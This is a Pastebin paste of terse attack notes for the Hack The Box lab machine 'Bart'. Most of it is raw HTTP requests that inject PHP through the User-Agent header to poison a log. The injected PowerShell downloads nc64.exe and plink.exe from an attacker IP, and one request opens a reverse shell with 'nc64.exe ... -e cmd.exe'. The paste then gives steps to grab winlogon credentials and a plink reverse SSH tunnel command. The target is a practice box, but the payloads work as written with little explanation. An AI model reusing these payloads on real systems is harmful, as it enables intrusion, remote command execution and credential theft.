API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 20th, 2018
359
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.01 KB | None | 0 0
raw download clone embed print report
  1. get nc64 to the box. and then execute that. Then upload plink.exe to the box to create a tunnel after.
  2.  
  3. I guess you are fine with this. Just make sure you upload 64.exe
  4.  
  5. GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
  6. Host: internal-01.bart.htb
  7. User-Agent: <?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.235:8000/nc64.exe','nc64.exe')\""); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  9. Accept-Language: en-US,en;q=0.5
  10. Accept-Encoding: gzip, deflate
  11. Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
  12. Connection: close
  13. Upgrade-Insecure-Requests: 1
  14.  
  15.  
  16.  
  17. GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
  18. Host: internal-01.bart.htb
  19. User-Agent: <?php exec("nc64.exe 10.10.14.235P 9999 -e cmd.exe"); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  20. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  21. Accept-Language: en-US,en;q=0.5
  22. Accept-Encoding: gzip, deflate
  23. Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
  24. Connection: close
  25. Upgrade-Insecure-Requests: 1
  26.  
  27.  
  28.  
  29. GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
  30. Host: internal-01.bart.htb
  31. User-Agent: <?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.235:8000/plink.exe','plink.exe')\""); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  32. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  33. Accept-Language: en-US,en;q=0.5
  34. Accept-Encoding: gzip, deflate
  35. Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
  36. Connection: close
  37. Upgrade-Insecure-Requests: 1
  38.  
  39.  
  40. then inside bart nc64.exe on the winlogon query
  41.  
  42. get the creds
  43.  
  44. then use plink to create a tunnel. SSh must be running on KALI
  45.  
  46. echo y|plink.exe -l root -pw passwordssh ipkali -R kaliport:127.0.0.1:windowsport
  47.  
  48.  
  49. Example:
  50.  
  51. echo y|plink.exe -l root -pw mypassword 10.10.15.88 -R 5555:127.0.0.1:445
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!